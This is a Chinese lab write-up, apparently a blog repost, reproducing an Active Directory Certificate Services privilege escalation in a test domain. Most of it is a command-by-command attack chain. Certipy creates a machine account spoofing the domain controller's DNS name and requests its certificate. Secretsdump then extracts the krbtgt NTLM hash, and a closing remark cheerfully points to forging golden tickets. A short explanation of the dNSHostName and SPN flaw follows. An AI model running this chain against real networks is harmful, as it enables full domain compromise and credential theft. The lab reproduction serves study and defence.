标签:证书 Krbtgt 125.156 Machine 2022 172.16 CVE 模板 属性
靶机环境搭建
- 域控DC(需要安装证书服务):172.16.125.156
- 攻击机Kali:172.16.125.157
- 域控普通账户:zhangsan/zs1234567890*
- 攻击工具:
靶机域控安装证书服务关键
攻击过程
漏洞信息收集
certipy find -debug -u zhangsan@sec.com -p "zs1234567890*" -dc-ip 172.16.125.156
注册机器账号
certipy account create -u "zhangsan@sec.com" -p "zs1234567890*" -dc-ip 172.16.125.156 -user "machinetestcymm" -dns "dc01.sec.com" -debug
注册机器账号证书
sudo certipy req -u "machinetestcymm$" -p "rFQeKXLCmmDQ5MuZ" -dc-ip 172.16.125.156 -ca sec-dc01-ca -template Machine -debug
获取机器账号NTLM-Hash
certipy auth -pfx dc01.pfx -dc-ip 172.16.125.156 -debug
获取Krbtgt的NTLM-Hash
python secretsdump.py -hashes aad3b435b51404eeaad3b435b51404ee:69eb46ed2b60a1c81bcc9fb09ffe9cfc "sec.com/dc01\$@172.16.125.156" -just-dc-user krbtg
后记
然后该做啥大家应该都清楚了吧,哈哈哈哈,黄金票据啊直接上。
原理
默认情况下:
- 域用户注册 User 证书模板;
- 域计算机注册 Machine 证书模板。
这两个证书模板都允许客户端身份验证。当用户账户申请 User 模板证书时,使用UPN(用户名@AD域名)这个唯一ID嵌入到证书中以进行识别,User 证书模板的 msPKI-Certificate-Name-Flag 属性存在一个 CT_FLAG_SUBJECT_ALT_REQUIRE_UPN 标志位,其指示 CA 将来自 Active Directory 中请求者用户对象的 UPN 属性值(用户名@AD域名)添加到已颁发证书的主题备用名称中。
而Machine证书模板没有UPN属性,但Machine证书模板的 msPKI-Certificate-Name-Flag 属性还存在一个 CT_FLAG_SUBJECT_ALT_REQUIRE_DNS标志位,其指示 CA 将从 Active Directory 中请求者用户对象的 DNS 属性获得的值添加到已颁发证书的主题备用名称中。
而这个dNSHostName属性值并不唯一,通过User用户创建Machine账户,将Machine账户(具有写入权限)的dNSHostName值改为与域控制器的计算机账户相同的dNSHostName值,欺骗AD CS申请到域控制器的AD证书。但SPN属性具有唯一性,它包含dNSHostName,如果dNSHonstName发生改变会带动servicePrintcipalName的RestrictedKrbHost和Host发生改变,由于唯一性会发生报错,所以想要漏洞完成漏洞要删除账户中的servicePrincipalName属性值。
参考链接
标签:证书,Krbtgt,125.156,Machine,2022,172.16,CVE,模板,属性 来源: https://www.cnblogs.com/KevinGeorge/p/16598187.html
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。